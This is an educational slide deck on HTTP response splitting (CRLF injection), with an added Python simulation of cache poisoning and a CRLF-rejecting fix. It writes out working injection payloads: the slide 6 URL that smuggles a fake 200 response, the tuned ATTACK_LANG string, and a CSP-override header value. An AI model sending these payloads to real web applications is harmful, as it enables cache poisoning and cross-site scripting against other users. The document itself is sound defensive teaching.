By Sharath Unni 
@haxorhead
Http response splitting
HTTP Response Splitting, or CRLF injection, is an attack technique which enables various attacks such as web cache poisoning, cross-user defacement, hijacking pages with sensitive user information and our favorite, cross-site scripting (XSS). This attack technique, and the attacks derived from it, are relevant to most web environments and are the result of the application's failure to reject illegal user input, in this case input containing malicious or unexpected characters (CR and LF).

The talk will cover the concept of the attack and will take you through some use cases.

  • Source: OWASP AppSec EU 2006
  • http://www.securityfocus.com/archive/1/411585

    1. By Sharath Unni @haxorhead
    2. • Involved parties
       • Root problem
       • Example
       • Web cache poisoning
       • XSS
       • Other derived attacks
       • Recommendations
    3. • There are always 3 parties (at least) involved
       • Web server: hosts the application, with the vulnerability (Tomcat, Apache, IIS etc.)
       • Target: an entity that interacts with the web server on behalf of the client, e.g. a squid proxy
       • Attacker: initiates the attack
    4. • Failure to reject illegal user input
       • Specifically input containing CR and LF characters
       • Carriage Return and Line Feed: %0d%0a (\r\n)
       • The data (user input) is included in an HTTP response header without any validation
       • HTTP connection sharing
       • Caching: less control over the site content; improves performance, speed etc.
    5. • Normal request:
         http://www.the.site/new_page.asp?lang=german
       • Normal response:
         HTTP/1.0 302 Redirect
         Location: http://www.the.site/new_page.asp?lang=german
         Connection: Keep-Alive
         Content-Length: 0
    6. • Request (attacker):
         http://www.the.site/welcome.asp?lang=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Pwned!</html>
       • Response:
         HTTP/1.0 302 Redirect
         Location: http://www.the.site/new_page.asp?lang=Foo
         Connection: Keep-Alive
         Content-Length: 0

         HTTP/1.0 200 OK
         Content-Type: text/html
         Content-Length: 20

         <html>Pwned!</html>Connection: Keep-Alive
         Content-Length: 0
    7. • Attack overview:
       • Attacker sends 2 requests:
         1. HTTP response splitter (with %0d%0a)
         2. An innocent request
       • Proxy will match 1st request -> 1st response
       • 2nd request (innocent) -> 2nd response in cache (Pwned!)
    8. [Sequence diagram] 1st attacker request (response splitter): origin answers 302, which the proxy sees as 302 followed by 200 (Pwned!). 2nd attacker request (innocent /index.html): proxy pairs it with the 200 (Pwned!) and caches it; the origin's real 200 (Welcome) is left dangling.
    9. • XSS: the second response is controlled by the attacker and JavaScript or HTML code can be inserted.
    10. • Evade CSP: Content Security Policy instructs the client browser from which location and/or which type of resources are allowed to be loaded
        • Certain browsers will interpret only the first occurrence of a duplicated HTTP header
        • HTTP response header: Content-Security-Policy / X-Content-Security-Policy
        • Injected value: Lang=en_US%0d%0aX-Content-Security-Policy: allow *
    11. • For developers:
          ◦ Validate user input and remove CRLF characters (particularly when setting cookies and redirecting)
        • For proxy vendors:
          ◦ Avoid sharing server TCP connections among different virtual hosts
          ◦ Derive the request host correctly from the URL and not from the Host header
    12. Thank you @haxorhead
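The following is an added example, not code from the slides or their author: a toy model of slides 5 to 7 and the developer fix from slide 11. `vulnerable_redirect` builds the 302 the way the slide's `new_page.asp` does (the raw `lang` value copied into `Location`); `parse_responses` frames the resulting bytes the way a proxy sharing one keep-alive connection would, showing the single 302 turn into two responses; `poison_shared_cache` pairs the attacker's two requests with those responses in order, so the innocent `/index.html` is cached with the injected body; `safe_redirect` rejects control characters before they reach a header. The attacker value is the slide's payload URL-decoded, with one adjustment: the injected `Content-Length` is set to 19 (the exact length of `<html>Pwned!</html>`) and the header separators to `%0d%0a`, so the framing lines up exactly. The proxy, the origin's `Welcome` page and the request URLs are constructed for the example.

```python
"""Toy model of HTTP response splitting on a redirect handler, the
cache-poisoning consequence on a shared keep-alive connection, and the
CRLF-rejecting fix. Added example; not the slides' or any real proxy's code."""
from urllib.parse import unquote

# Constructed attacker value for the lang parameter (slide 6, URL-decoded).
# Content-Length 19 is the exact body length so the split parses cleanly.
ATTACK_LANG = unquote(
    "Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a<html>Pwned!</html>"
)


def vulnerable_redirect(lang: str) -> bytes:
    """Builds the 302 from slide 5: lang is copied into Location unvalidated,
    so CR/LF inside it terminates the header block and starts a new response."""
    return (
        "HTTP/1.0 302 Redirect\r\n"
        f"Location: http://www.the.site/new_page.asp?lang={lang}\r\n"
        "Connection: Keep-Alive\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_responses(wire: bytes) -> list:
    """Frames consecutive HTTP/1.0 responses as a proxy on a shared connection
    would: status line, headers, then Content-Length bytes of body. Chunks
    whose first line is not a status line (the stray trailing headers on
    slide 6) are skipped."""
    responses, pos = [], 0
    while pos < len(wire):
        head_end = wire.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        status, *header_lines = wire[pos:head_end].decode("latin-1").split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        body = wire[body_start:body_start + length]
        pos = body_start + length
        if status.startswith("HTTP/"):
            responses.append({"status": status, "headers": headers, "body": body})
    return responses


def poison_shared_cache(lang_value: str) -> dict:
    """Slide 7: the proxy forwards two attacker requests over one origin
    connection and pairs responses to requests strictly in order. With the
    split 302, the injected 200 is matched to the innocent request and cached."""
    requests = [f"/new_page.asp?lang={lang_value}", "/index.html"]
    # Constructed origin traffic: the redirect, then the real /index.html page.
    wire = vulnerable_redirect(lang_value) + (
        b"HTTP/1.0 200 OK\r\nContent-Length: 7\r\n\r\nWelcome"
    )
    cache = {}
    for url, resp in zip(requests, parse_responses(wire)):
        if resp["status"].startswith("HTTP/1.0 200"):
            cache[url] = resp["body"]  # the proxy caches 200s by request URL
    return cache


def safe_redirect(lang: str) -> bytes:
    """Slide 11 fix: reject any value carrying CR, LF or other control
    characters before it is placed in a response header."""
    if not lang.isascii() or any(ord(ch) < 0x20 or ch == "\x7f" for ch in lang):
        return b"HTTP/1.0 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return vulnerable_redirect(lang)  # only plain header-safe values reach here


if __name__ == "__main__":
    for resp in parse_responses(vulnerable_redirect(ATTACK_LANG)):
        print(resp["status"], resp["body"])
    print(poison_shared_cache(ATTACK_LANG))
    print(safe_redirect(ATTACK_LANG).split(b"\r\n")[0])
```

Running it shows the one redirect framed as a 302 plus a 200 carrying `<html>Pwned!</html>`, the toy cache holding that body under `/index.html`, and the hardened handler answering the same input with a 400. The reject-rather-than-strip choice matters because stripping only `\r\n` can leave a bare `\n` that some parsers still treat as a line end.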